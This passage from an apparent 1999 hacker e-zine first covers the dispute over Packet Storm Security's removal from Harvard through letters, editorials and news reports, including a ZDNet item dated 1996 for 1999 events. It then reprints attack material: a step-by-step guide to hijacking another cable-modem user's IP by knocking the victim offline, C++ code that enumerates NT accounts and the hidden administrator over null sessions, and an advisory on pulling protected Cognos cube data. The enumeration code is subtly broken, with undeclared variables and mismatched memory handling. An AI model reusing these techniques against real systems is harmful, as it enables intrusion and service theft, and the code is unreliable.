possibly some sort of legal action from Harvard. Harvard seems to be
trying to free themselves of any liability, and use me as the fall guy
for this whole thing. All agreements with Harvard in the beginning were
verbal (with Jeff Gray, the senior sysadmin), so I've got nothing on
paper to back up the truth. I've got emails, but I don't have the money
or legal defense to counter Harvard, or anybody else for that matter.

This has turned really ugly, really quickly, and it is very plausible
that I will be facing charges involving "hacking" or computer crimes of
some sort, because I "never had a Harvard ID, and thus was not authorized
to use their facilities", and I "compromised their security." I guess it
doesn't matter that I was contacted by the Senior Sysadmin at Harvard and
invited to move my site there. It doesn't matter that the head of Harvard
UIS approved of everything. It doesn't matter that he placed the box on a
subnet of his choosing and called me and gave me the root password and
told me I had free rein on the box. It doesn't matter that Harvard
network security was never actually compromised.

For the record, Jeff Gray, the Harvard senior sysadmin, has been
extremely supportive of my site and work from the beginning, and he
deserves A LOT of credit for going out of his way to help keep Packet
Storm Security alive and online. In fact, Jeff Gray has provided so much
support for "the security community" in general, and is so supportive of
security-related research and projects, that he deserves all the credit
in the world for his efforts. I hope Harvard gives him the credit he is
due, because any network security they have is in large part due to his
skills, devotion, and diligence.

If that's not enough to annoy me, all of my class work for the class I'm
taking at NCSU this summer (CSC499 Independent Research project involving
IDS) is/was on that server at Harvard and gone now too.
With 4 weeks left in the semester here at NCSU, I have just lost seven
weeks of work and data that cannot be replaced in 4 weeks.

What bothers me the most is that all of the countless hours I put into
that web site and the archives, thousands of hours, are gone now, for
good. The site was getting over 400,000 hits/day and doing about 10
GB/day in transfers, so I don't see it coming back online even if I do
get any of the site content back.

Obviously, I have taken full responsibility for the site content and all
activities and events associated with that server. Even though no laws or
rules were broken, on my part, and to my knowledge, I am now facing
possible legal action from both JP and Harvard, and state/federal
computer crime charges as well.

What am I going to do now? I don't know. The web site I devoted most of
my waking hours to is gone. My chances of passing my CSC499 class do not
look good, according to the negative comments from my professor. I'll try
to salvage the summer's worth of course work anyway if possible and pass.
Until formal charges are filed, I've still got my job and account here at
NCSU. When NCSU catches wind of this, and I'm sure they will, my account
probably will be permanently revoked, and my job and the past three years
of school will then be gone too. Until then, I can be contacted at the
email address in the sig below.

Check out the news and history of John Vranesevich and Carolyn Meinel's
smear and harassment campaigns that have ruined the careers and lives of
many people, mine included. www.attrition.org has all of the details.
Funny how I spent the past few years donating my time, literally
thousands and thousands of hours, to "the security community", never
asking for or making a single penny off the time and work I invested,
and have now lost it all because John Vranesevich and a few of his IRC
friends are able to make quick phone calls, fabricate absurd stories
about criminal activity, libel, threaten to sue Harvard, and I don't even
get to plead my case. I am guilty without even being informed of what was
going on. He has effectively ruined years of my work, my education, my
career, my life.

There are really only four things that I'd like right now:

1. Justice
2. Truth
3. The 3 GB of MY data that Harvard has and refuses to turn over to me
4. A job in the IT/IS/IW industries - the pay doesn't even matter, I'm
   willing to move, I'm willing to put in 60-80 hour weeks. Just give me
   a UNIX or Linux box to work from.

I'll settle for just the job though, and like I said, the pay doesn't
matter - I love computers, network security, and systems administration.
If I was not doing it for pay, I'd be doing it for free.

See you at BlackHat and DEFCON.

take it easy,

Ken Williams
jkwilli2@unity.ncsu.edu

if you need to reach me by phone, email me at jkwilli2@unity.ncsu.edu
and CC the email to packetstorm@genocide2600.com with phone # request.
my pgp keys are available on all of the regular keyservers, and at
www4.ncsu.edu/~jkwilli2/

[Note: yes, you can quote or print any part of or the whole email.]
Ken Williams
ken@packetstorm.harvard.edu
Packet Storm Security
http://packetstorm.harvard.edu

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQEVAwUBN3sH3pDw1ZsNz1IXAQE67QgAt5O4cgV4UN/tNro0V9Hkrz4YJGuysf2F
aZdUuM+P73MwwlvjKFpLW5WOJwtZzFjicv6RYMlXaMLRL48Fz/rltX95dy71LCOs
/UVa9LXvh7kSgD5p/pSeP2+zyDuvbvUxjtSTIPRp68sOQTKILaQpohwl9hzpfVLz
ADvQMD5vAUqGlTeoQrZRmHC/OxtWqVEgh72Gms4XpGaGwT3OdtoRKuK0d4Js3mP9
Vs1szlsT3DQEFvdblLR/jsf8jonbME/Imo89K69wFsbyeVpIB1+g0Se11BdQCbeU
TdauQTJMfDTkIWSQvpQXXIhvukErb8D9bmFvKiE7MqS+N8RVaMO7Zw==
=7OhX
-----END PGP SIGNATURE-----

***************************************************************************

-=-

Net Thug Shuts Down Largest Free Security Site
Wed Jun 30 16:36:10 MDT 1999
ATTRITION Staff

Earlier today, the PacketStorm Security site was abruptly shut down with
no warning. PacketStorm (packetstorm.harvard.edu) was one of the largest
and most respected sites catering to security professionals worldwide.
Boasting an average of 400,000 hits a day, pushing out roughly 10 gigs of
traffic, the site was a valuable resource to an estimated 10,000 security
professionals world wide.

The security resource did not suffer at the hands of hackers or network
intruders. Instead, a new kind of malicious criminal found success
through a fear that haunts more and more Americans today. A single piece
of email from John Vranesevich (founder of AntiOnline) to the educational
institution hosting Packetstorm threatened a lawsuit if the site was not
shut down. Harvard said there were "numerous" complaints, but provided no
additional details. Like most US institutions, the idea of being dragged
to court for any reason is enough to scare them into hasty action. With
that mail, Harvard pulled the plug. This decision was no doubt made as an
easy alternative to spending time and resources fighting the claims.
Email from Ken Williams, primary administrator for the site, to Attrition
staff indicated that not only did Harvard shut down the site, they denied
him access to the machine and all information stored on it. The
correspondence noted the likelihood that all information on the machine,
and all backups, would be destroyed in order to avoid the AntiOnline
lawsuit.

"All of the content and the backups made are either destroyed, being
destroyed now, or will be before I can do anything to prevent it." said
PacketStorm founder Ken Williams.

Williams went on to say that he does not fear any fraudulent lawsuit
Vranesevich could attempt to level at him. The information contained on
the site regarding Vranesevich was not in violation of any US law that he
was aware of, and had been there for over a year.

Along with the security site, months of Williams' own school work was
lost. "I have just lost seven weeks of [class] work and data that cannot
be replaced in 4 weeks." Williams said, referring to deadlines on the
school work.

"What bothers me the most is that all of the countless hours I put into
that web site and the archives, thousands of hours, are gone now, for
good." - Ken Williams, PacketStorm founder

These vague and unfounded legal threats only serve to hurt the security
community. AntiOnline's mission statement claims they exist "to educate
the public on computer security related issues." Apparently, this mission
statement forgot to include such things like "educate the public through
OUR site only" and "as long as we profit from it".
***************************************************************************

JP has since offered this news:
http://www.antionline.com/archives/editorials/packetstorm.html

( Likely suffering major DoS attacks as a result of their actions, I was
unable to get thru to the site to read their shit for posting
here...they will burn in hell for this action - Ed )

Ok I cut thru the cruft, here's JP's 'story';

PacketStorm Is Shut Down
An AntiOnline Editorial
Thursday, July 01 1999

Apparently for some time now, PacketStorm Security, a popular underground
collection of security related tools and information, has been
maintaining a vast archive of materials about AntiOnline. These materials
included entire stories, copies of the weekly mailbag, e-mails, and other
materials copyrighted by AntiOnline LLP. On top of that, and what was far
more serious, the site contained dozens and dozens of items which
included: e-mails, messages, documents, images, and even public surveys.
These materials were libelous, and in some cases, were blatant threats
against members of my immediate family, myself, and my company.

While I value the right to free speech as much, if not more, than the
average American, I do not believe in individuals posting threatening and
harassing documents about another individual, and their family members.
It was for this reason, and no other, that I contacted Harvard
University, which was hosting the PacketStorm Website, and requested that
it be shut down. I did not threaten legal action, but simply directed
University Administration to the website, for them to view, and to judge,
on their own. Below is a copy of that letter:

Greetings:

May I first say that I did my best to see that this letter got sent to
the appropriate individuals. I had some difficulty determining who those
individuals may be, so if I have made an error, I would greatly
appreciate it if you would forward this letter on to the appropriate
individual(s).
My name is John Vranesevich, and I am the Founder and General Partner of
AntiOnline LLP, a computer security company based outside of Pittsburgh,
PA.

Earlier today, one of my colleagues forwarded me the following URL:

http://packetstorm.harvard.edu/jp/

Needless to say, I was shocked and outraged at what I saw. This page
contains a large archive of libelous and, to put it bluntly, sick
material. Everything from archives of copyrighted material from our
website, to altered pictures of my family, to 'stories' about me which
contain images ranging from people engaged in homosexual activities, to a
nun that appears to be covered in seminal fluid.

I am astounded that an institution as prestigious as Harvard would be
party to the dissemination of this type of material. It is my hope that
the University Administration was unaware of this site, and now that it
has been brought to their attention, it is my hope that it will be dealt
with promptly. I have worked to help several educational institutions
develop 'Acceptable Use Policies', and if Harvard is similar to them, the
above URL would be a clear violation of that policy.

It is my hope that the above mentioned domain will be shut down
immediately, and that the individual responsible will be seriously
reprimanded. I hope to hear from you soon about this matter, and what you
may have done regarding it.

Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline

Tonight, Ken Williams, the founder of Packet Storm Security, released a
letter to the public. The letter read in part:

Funny how I spent the past few years donating my time, literally
thousands of hours, to "the security community", never making even a
penny off the time and work I invested, and have now lost it all because
some asshole named John Vranesevich is able to make a quick phone call,
fabricate absurd stories about criminal activity and bullshit I never
did, and effectively ruin years of work, my education, my career, my
life.
Ken, I know what it's like to dedicate many, many, thankless hours to a
project, believe me. But, you did not lose your site because of me, you
lost it because of you. I could not stand by and watch your site be used
as a platform to harass and threaten my family, myself, and the business
which I have worked hard to start. While you, and others who 'follow you'
may criticize me for what I did, I think everyone that's reading this,
who has family members that they love, and a career that they enjoy, will
admit to themselves that if in my shoes, they would have done at least
the same. I hold absolutely no grudge towards you as a person, and I hope
that you have the best of success in all that you do.

Due to the types of threats that I have been receiving, and that sites
like PacketStorm have been propagating, local law enforcement agencies
were put on alert, and began doing extensive extra patrolling of the
residence of my family members, my own residence, and the AntiOnline
Offices. I realize that the actions that I have taken against PacketStorm
may greatly increase the immediate threat against my family, myself, and
my company; and that the harassment will now only get worse. However, I
will not allow my family, myself, nor my company to become a victim. I am
standing my ground, and will continue AntiOnline's mission of putting an
end to malicious hackers.

People in this country have the right to say and do whatever they please,
unless that is, what they say and do infringes on the rights of another
- anonymous.

Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline

-=-

***************************************************************************

Packetstorm mirror site announced at HNN: http://packetstorm.nl.linux.org/

" Support for Ken Williams Continues to Grow
contributed by Space Rogue

The outpouring of support for Ken Williams and Packet Storm Security has
been phenomenal.
One such item of support has been the beginning of an effort to rebuild
PSS from scratch as a grassroots effort. The organizer of this is asking
anyone who ever downloaded a file from PSS to upload it here.

PacketStorm Mirror
http://packetstorm.nl.linux.org/

***************************************************************************

Statement from Harvard:
=======================

* S T A T E M E N T *

As a service to the Internet community, Harvard agreed to host a Packet
Storm Security Website for security-related materials only. Without
Harvard's knowledge, unrelated content was put on the Harvard server,
including sexually-related material and personal attacks on an individual
not affiliated with the University. A Harvard administrative site focused
on security issues is not the forum for this type of material. We are
returning the content on the site and hope that Packet Storm will make
its security tools available through its own Website.

Joe Wrinn
Director
Office of News and Public Affairs

Joe Wrinn
Director, Harvard News Office
1350 Massachusetts Ave., Rm. 1060
Cambridge, MA 02138

***************************************************************************

Ken's Rebuttal to the Harvard statement;

Date: 7/1/99 17:58
Received: 7/1/99 18:01
From: Ken Williams, jkwilli2@unity.ncsu.edu

Hi,

[The Harvard] statement is incorrect, and even libelous itself by
implying that I had "sexually related material" on the server. I NEVER
did! NOW, I will retain legal counsel. This is outrageous! I wouldn't
have been surprised to find myself slandered by John Vranesevich and
AntiOnline, but to have Harvard implicitly state that I was serving up
"sexually related material" to the Internet is absurd, libelous, and
legally reprehensible. Are you, Harvard, trying to ruin my reputation and
career now too?
It sounds to me like you are fabricating this "sexually related material
and personal attacks" statement to appease your critics, and, as I (now
ominously) mentioned in my first open letter, trying to use me as the
fall guy.

Regretfully,
Ken Williams

***************************************************************************

ZDNet; ZDNN: Harvard caught in hacker crossfire
Tue, 01 April 1996 18:29:02 GMT

Harvard University is caught in the middle of an online war between
hacking-scene follower AntiOnline.com and the hacking community at large.

On Wednesday, the Cambridge, Mass., university removed an independent
security Web site, known as Packet Storm, which it had been mirroring on
its servers for only 10 days. The reason: A directory of material hidden
in the Web site, and thus on Harvard's servers, that had "sexually
related material and personal attacks on an individual not affiliated
with the University," said Joe Wrinn, director of news and public affairs
for Harvard, in a statement released by Harvard on Thursday.

"We agreed to have a site that had security-related materials only," said
Wrinn. "Both parties involved were using us in a way that was completely
inappropriate."

Ken Williams, a North Carolina State University employee and the
Webmaster of Packet Storm, angrily refuted the allegations. "This
statement is incorrect, and even libelous itself by implying that I had
'sexually related material' on the server," he wrote in an e-mail. "I
never did!"

According to Williams, the directory -- labeled "/jp" because it was a
collection of material satirizing AntiOnline founder and chief John P.
Vranesevich -- had a parody of the AntiOnline site. But others familiar
with the site said that the parody also contained photos of nude women
that were intended to be more sarcastic than sexual. Harvard obviously
didn't get the joke. Harvard's Wrinn did not know specifically what sort
of "sexual" content was contained on the site.
Harvard in the hot seat

"We are in the middle of this and it's inappropriate," said Harvard's
Wrinn, sounding distinctly uncomfortable with the attention that the
issue was attracting. Harvard intends to send the complete contents of
the site back to Williams so that he can post it elsewhere.

No wonder: Packet Storm wasn't just a small-time site -- it had been the
place to go for both hackers and security experts to get up-to-date
security information.

"Packet Storm was a huge compilation of security tools," said Brian
Martin, known as "Jericho," one of the Webmasters at hacker news and
information site Attrition.org. "It was updated daily with tools. It was
always there."

Among organizations that used and mirrored the site: The Department of
Defense and the Federal Bureau of Investigation, claimed Webmaster
Williams.

'I didn't have an anti-J.P. Temple of Hate'

Yet, Williams had also sided with many others in hacker circles who have
been waging a war -- mainly of words -- against AntiOnline's Vranesevich
and his latest ally, Carolyn Meinel, security researcher and webmaster of
The Happy Hacker.

"I didn't have an anti-J.P. Temple of Hate or anything," said Williams.
"But there are companies, organizations, and individuals out there that
[we believe] are black-eyes of the industry."

So, Williams attached a non-public directory to the Web site that
archived parodies and criticisms of AntiOnline's founder. The directory
represented a single facet of a complex war of image in the hacker
not-so-underground. For the most part, AntiOnline and its main foe,
Attrition.org, have squared off with conflicting allegations of slander,
libel and plagiarism.

'I am kind of disappointed that an institution like Harvard was so quick
to pull the plug just to avoid a potential suit.'

"I can understand a parody -- I have no problem with that," said the
20-year-old Pennsylvania Webmaster, adding that he thought Williams
acknowledged that the photos had been put up, but that since they had
come from a source already online, the Packet Storm Webmaster thought the
pictures were fair game.

Vranesevich's answer? The Webmaster notified Harvard of the hidden
directory in a letter to the university's provost -- and Harvard quickly
took the site down.

Did Harvard act too quickly?

B.K. DeLong, a Boston-based computer security consultant, thought Harvard
acted too quickly. "I am kind of disappointed that an institution like
Harvard was so quick to pull the plug just to avoid a potential suit," he
said.

Yet Harvard wasn't the only one to act quickly. By late Wednesday night,
the Keebler Elves -- the cybergang that claimed responsibility for
hacking into the National Oceanic and Atmospheric Administration last
week -- defaced another government Web site with the news. "Now, because
of [JP] ... Packetstorm is no more, and never will be again," the site
http://www.aao.uc.usbr.gov/ lamented.

Unnamed hackers also struck at AntiOnline more directly. AntiOnline's
site came under a denial-of-service attack -- which floods a particular
site with random data -- so severe that its Internet service provider
pulled the site for almost 12 hours on Thursday, said Vranesevich.

Ugly threats

Other attacks were even less friendly. "I have received more death
threats in the last 24 hours by phone, than I have in five years," he
said.

Not quite an apology, Vranesevich added that he never intended the entire
Packet Storm site to be taken down. "I know what it's like to have the
university stomp its foot down on you. When I was a student at the
University of Pittsburgh, I had my Web site shut down," he said. "But I
never threatened anyone." In his mind, the contents of "/jp" did.
@HWA

03.0 Cable Modem Hijacking from www.hackcanada.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

Cable Modem IP Hijacking in Win95/98

The purpose of this is to show you how bad cable modem security is and
that even with a Win box you can take someone else's IP. You can hijack
IPs using a cable modem and it's very simple in any operating system.
Just follow the steps:

1) Choose someone's IP that you wish to have. Make sure the IP is on the
   same network. Most cable modem providers use DHCP. The first thing you
   have to do is find the victim's IP. Remember the victim's IP has to be
   in the same network and with the same service provider for this to
   work.

2) Now this is probably the hardest thing in this file (but it's still
   easy): you have to wait until the victim's computer is off, or you can
   smurf-kill his connection. When you think his computer is off-line,
   ping it to see if you get a response. Do this by going to a DOS prompt
   and typing ping (victim's IP). If you get a response then you have to
   try harder. After you get his PC off-line, go into your network
   properties and edit the IP settings, but instead of having yours there
   put in the victim's IP, host, and domain.

3) Restart. If you restart and get an IP conflict, the victim's computer
   is on (Windows checks for a duplicate of its address with ARP at boot,
   and that dialog is the result). If you don't get an IP conflict, open
   your web browser and see if it works. With some cable modem providers
   you might also have to add the Gateway, Subnet mask (255.255.255.0),
   Host, DNS search order, and Domain. Now you can go. Everything will
   work until the victim's PC is back on. Once it is back online it will
   take the IP away, because the provider's equipment sees the address
   coming from the wrong MAC address.

*Linux*

This is also possible in Linux, but setting the IP by hand is not the
best way. You can change your MAC address to the victim's instead; that
is more secure (the provider sees the MAC it expects) and much easier.
There are a couple of scripts to change your address, just look around.
Warning: Some cable modem service providers will know when you're using
the wrong IP, but hey, it might be useful.

Copyright (c) 1999 Wildman www.hackcanada.com

@HWA

04.0 Exploiting Null Session Weaknesses in NT environment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

Details About NULL Sessions

This page is a detailed explanation of programmatically connecting to NT
Server NULL sessions and extracting the name of the true administrator
account. Even non-programmer admins should read through this and become
familiar with the APIs explained, in order to better understand the NT
environment and recognize code that might be used against them.

The original purpose of NULL sessions is to allow unauthenticated hosts
to obtain browse lists from NT servers and participate in MS networking.
Mostly this is useful for Win95/98/NT hosts that are not domain members
but still need to obtain browsing information. The problem occurs where
a NULL session is counted as a member of the Everyone group and so gains
access to resources it never authenticated for, simply because Everyone
has permissions on them. Originally 'everyone' did not mean 'anyone':
you still had to log on to be in the Everyone group. NULL sessions are
the one case where 'everyone' can mean 'anyone'. This is the reason MS
created the *NEW* Authenticated Users group. Authenticated Users does not
include NULL sessions and so can never mean 'anyone' - until someone
finds an exploit.

Why bother extracting the administrator's name? Because renaming the
Administrator account hides nothing: the account keeps relative ID (RID)
500 as the last component of its SID, and anyone who can enumerate
accounts over a NULL session can look up each account's SID and pick out
the one that ends in 500.

The following code segments are commented to show exactly what is
happening, what APIs are being used, and how the true administrator name
can be identified.

First - making a NULL Session connection

One way to do this is by using the Net Use command with an empty
password. Programmatically, it looks like this....
// Build with the Platform SDK headers and link against netapi32.lib and
// mpr.lib. The tool's own dialog header (which declares CNTOHunterDlg and
// its CTreeCtrl member m_Victims) is also needed and is not reproduced here.
#include <windows.h>
#include <lm.h>        // NetUseAdd, NetUseDel, NetShareEnum, NetUserEnum, NetApiBufferFree
#include <afxwin.h>    // CString
#include <afxcmn.h>    // CTreeCtrl

// Prototypes for the two helpers defined further down
bool GetAdmin(char* pServer, char* pUser, CString& Name);
void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg,
                   HTREEITEM userRoot, HTREEITEM adminRoot);

//This function called from dialog that fills listbox with connections
BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)
{
    //Setup for UNICODE
    char* pTemp = TargetHost.GetBuffer(256);
    WCHAR wszServ[256];
    LPWSTR Server = NULL;

    //Convert to Unicode
    MultiByteToWideChar(CP_ACP, 0, pTemp, strlen(pTemp)+1,
                        wszServ, sizeof(wszServ)/sizeof(wszServ[0]));

    //Create the IPC$ share connection string we need
    Server = wszServ;
    LPCWSTR szIpc = L"\\IPC$";
    WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL
    DWORD dwServNameLen;
    DWORD dwRC;

    //Setup Win32 structures and variables we need
    NET_API_STATUS nas;
    USE_INFO_2 ui2;
    SHARE_INFO_1* pSHInfo1 = NULL;
    DWORD dwEntriesRead;
    DWORD dwTotalEntries;

    //Set up handles to tree control to insert connection results
    //(initialised, so a host with no shares still gets a valid parent item)
    HTREEITEM machineRoot = NULL, shareRoot = NULL, userRoot = NULL,
              adminRoot = NULL, attribRoot = NULL;
    char sharename[256];
    char remark[256];

    if(Server == NULL || *Server == L'\0')
    {
        TargetHost.ReleaseBuffer();
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    dwServNameLen = lstrlenW(Server);

    //Test for various errors in connection string and recover
    if(Server[0] != L'\\' && Server[1] != L'\\')
    {
        // prepend slashes and NULL terminate
        RemoteResource[0] = L'\\';
        RemoteResource[1] = L'\\';
        RemoteResource[2] = L'\0';
    }
    else
    {
        dwServNameLen -= 2; // drop slashes from count
        RemoteResource[0] = L'\0';
    }

    if(dwServNameLen > CNLEN)
    {
        TargetHost.ReleaseBuffer();
        SetLastError(ERROR_INVALID_COMPUTERNAME);
        return FALSE;
    }

    if(lstrcatW(RemoteResource, Server) == NULL) { TargetHost.ReleaseBuffer(); return FALSE; }
    if(lstrcatW(RemoteResource, szIpc) == NULL)  { TargetHost.ReleaseBuffer(); return FALSE; }

    //Start with clean memory
    ZeroMemory(&ui2, sizeof(ui2));

    //Fill in the Win32 network structure we need to use connect API
    //(the Net* APIs are always Unicode, so these are LPWSTR regardless of build)
    ui2.ui2_local      = NULL;
    ui2.ui2_remote     = (LPWSTR) RemoteResource;
    ui2.ui2_asg_type   = USE_IPC;
    ui2.ui2_password   = (LPWSTR) L"";   //SET PASSWORD TO NULL
    ui2.ui2_username   = (LPWSTR) L"";
    ui2.ui2_domainname = (LPWSTR) L"";

    //MAKE THE NULL SESSION CALL
    nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
    dwRC = GetLastError();
    if( nas != NERR_Success )
    {
        //No null session, so nothing below would be answered; report the failure
        TargetHost.ReleaseBuffer();
        SetLastError( nas );
        return FALSE;
    }
    machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT);

    //THIS IS WHERE NT HANDS OUT ITS INFORMATION
    nas = NetShareEnum((LPWSTR)Server, 1, (LPBYTE*)&pSHInfo1, MAX_PREFERRED_LENGTH,
                       &dwEntriesRead, &dwTotalEntries, NULL);
    dwRC = GetLastError();
    if( nas == NERR_Success )
    {
        if(dwEntriesRead > 0)
        {
            shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot, TVI_LAST);
            userRoot  = pDlg->m_Victims.InsertItem("Users",  machineRoot, TVI_LAST);
            adminRoot = pDlg->m_Victims.InsertItem("Admin",  machineRoot, TVI_LAST);
        }
        //Walk the entries actually returned (dwEntriesRead), indexing the
        //buffer so the base pointer survives for NetApiBufferFree below
        for(DWORD x = 0; x < dwEntriesRead; x++)
        {
            // Convert back to ANSI
            WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)pSHInfo1[x].shi1_netname, -1,
                                sharename, 256, NULL, NULL);
            WideCharToMultiByte(CP_ACP, 0, (LPCWSTR)pSHInfo1[x].shi1_remark, -1,
                                remark, 256, NULL, NULL);
            CString ShareDetails = sharename;
            ShareDetails = ShareDetails + " - " + remark;
            //fill the tree with connect info
            attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot, TVI_LAST);
        }
        //The enum buffer is allocated by the API and must be freed by the caller
        NetApiBufferFree(pSHInfo1);
    }

    //My Wrapper function for listing users - see below
    DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

    //WE ARE DONE, SO KILL THE CONNECTION
    nas = NetUseDel(NULL, (LPWSTR) RemoteResource, 0);
    TargetHost.ReleaseBuffer();
    SetLastError( nas );
    return TRUE;
}

The following function is how one can programmatically determine the
administrator status of an account......
bool GetAdmin(char* pServer, char* pUser, CString& Name) { BOOL fAdmin = FALSE; DWORD dwDomainName,dwSize,dwAdminVal; SID_NAME_USE use; PSID pUserSID = NULL; // SID for user int rc; int iSubCount; bool bFoundHim = 0; dwDomainName = 256; dwSize = 0; dwAdminVal = 0; iSubCount = 0; //Call API for buffer size since we don't know size beforehand rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); rc = GetLastError(); //Allocate a larger buffer if(rc == ERROR_INSUFFICIENT_BUFFER) { pUserSID = (PSID) malloc(dwSize); //Repeat call now that we have the right size buffer rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); } //Scan the SIDS for the golden key - ADMIN == 500 //Get a count of SID's iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID)); //Admin SID is the last element in the count dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1)); if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN { Name.Format("Admin is %s\\%s\n", szDomainName, pUser); bFoundHim = true; } delete pUserSID; return bFoundHim; //WE KNOW WHO HE IS, ADD HIM TO THE TREE } Wrapper for Listing the user accounts..... 
void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot) { USER_INFO_10 *pUserbuf, *pCurUser; DWORD dwRead, dwRemaining, dwResume, dwRC; char userName[256]; char userServer[256]; dwResume = 0; if(pServer[0] != L'\\' && pServer[1] != L'\\') { //Start sting with correct UNC slashes and NULL terminate RemoteResource[0] = L'\\'; RemoteResource[1] = L'\\'; RemoteResource[2] = L'\0'; } else { dwServNameLen -= 2; // drop slashes from count RemoteResource[0] = L'\0'; } if(dwServNameLen > CNLEN) { SetLastError(ERROR_INVALID_COMPUTERNAME); return; } if(lstrcatW(RemoteResource, pServer) == NULL) return; do { pUserbuf = NULL; //THIS IS THE API THE NT USES TO HAND OUT IT's LIST dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf, 1024, &dwRead, &dwRemaining, &dwResume); if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS) break; DWORD i; for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser) { // Convert back to ANSI. WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1, userName, 256, NULL, NULL ); // Convert back to ANSI. WideCharToMultiByte( CP_ACP, 0, pServer, -1, userServer, 256, NULL, NULL ); if(!GotAdmin) { //use char strings CString Admin; GotAdmin = GetAdmin(userServer, userName, Admin); if(GotAdmin) { Admin.TrimRight(); HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST); pDlg->m_Victims.EnsureVisible(adminChild); } } CString strUserName = userName; pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST); } if (pUserbuf != NULL) NetApiBufferFree(pUserbuf); } while (dwRC == ERROR_MORE_DATA); if (dwRC != ERROR_SUCCESS) printf("NUE() returned %lu\n", dwRC); } Send mail to info@ntobjectives.com with questions or comments about this document. Copyright © 1999 NT OBJECTives, Inc. All Rights Reserved. All trademarks are the property of their respective owners. Last modified: June 28, 1999 @HWA 05.0 Cognos PowerPlay Web Edition security vunerability allows access to data cubes.. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/

Date: Mon, 28 Jun 1999 07:29:37 -0400
From: Darin White
To: BUGTRAQ@netspace.org
Subject: Cognos PowerPlay Web Edition security

WEB SECURITY ADVISORY
-------------
Release Date:  1999-06-25
Application:   Cognos PowerPlay Web Edition
Severity:      Unauthenticated web users can sniff cube data
Author:        Darin White
Operating Sys: Microsoft NT Server
--------------

I. Description

Due to design problems as well as some potential web server misconfiguration
PowerPlay Web Edition may serve up data cubes in a non-secure manner.
Execution of the PowerPlay CGI pulls cube data into files in an unprotected
temporary directory. Those files are then fed back to frames in the browser.
In some cases it is trivial for an unauthenticated user to tap into those
data files before they are purged. Cognos has been contacted but does not
regard this as a serious exposure (see appendix B below).

The issues are:
 (a) dynamic directory listing
 (b) weak temporary filename algorithm
 (c) ad hoc parameters to the CGI

II. Details

Identifying PowerPlay sites is quickly accomplished using AltaVista

 http://www.altavista.com/cgi-bin/query?pg=q&kl=XX&q=%2Blink%3Appdscgi.exe&search=Search

which hits all pages containing a link to the PowerPlay CGI ppdscgi.exe on
NT.

Normal authentication for protected cubes occurs when a user selects a link
like:

 Example

At this point the user is prompted for a userid and password. Beyond this
check there seems to be no verification that data is being fed out to the
browser that requested it and was authorized.

(a) dynamic directory listing

Netscape Enterprise Server 3.5.1 appears to be serving up dynamic directory
listings by default. A known PowerPlay site can be hit with a request for

 http://www.example.com/ppwb/Temp/

which will return something like:

 /ppwb/Temp/ -
 6/25/99 9:17 AM   17904   1ad6t.htm
 6/25/99 9:17 AM   37828   1ad6x.htm

Here we see two temporary files created by one initial cube request. The
suffix 't' in the first filename denotes the PowerPlay toolbar and 'x'
denotes the data content. These files are fed back to the browser to
populate two frames. Clicking on the content filename will allow any user to
browse the current cube view with no authentication challenge even if the
cube has been password-protected. Once into the cube the user may continue
to drill for further data.

(b) weak temporary filename algorithm

Sites that have disabled directory listing may still be vulnerable. Many
sites using PowerPlay offer a mix of protected and unprotected cubes. Some
sites also offer an anonymous user account (let's say "guest" for example).
The PowerPlay CGI uses a common temporary directory for serving all cubes
back to the browser. Using the guest account or viewing an unprotected cube
a user may right-click the content area and select View Frame Info which
will display the temporary filename. By repeatedly reloading the initial
cube view and viewing frame info a list of temporary filenames may be
generated in order to analyze the filename algorithm. e.g.

 http://www.example.com/ppwb/Temp/1eeex.htm
 http://www.example.com/ppwb/Temp/1f77x.htm
 http://www.example.com/ppwb/Temp/1fcfx.htm
 http://www.example.com/ppwb/Temp/1ff6x.htm
 http://www.example.com/ppwb/Temp/2014x.htm

Analysis of the filename progression shows:

 * the last char is 'x' for the data and 't' for the toolbar
 * first n-1 chars are hexadecimal chars only
 * the hexadecimal "numbers" comprising the filename are ascending only
 * the first char is never 0. e.g. fffx.htm => 1000x.htm
 * simple hexadecimal subtraction on the first n-1 chars of consecutive
   filenames shows a very predictable pattern (see appendix A)

A user may orient themselves in the namespace (the set of all possible
filenames) by using a guest account or unprotected cube. Once oriented a set
of candidate filenames may be generated and requested from /ppwb/Temp on the
server. Of course this approach assumes valid users are hitting the cubes at
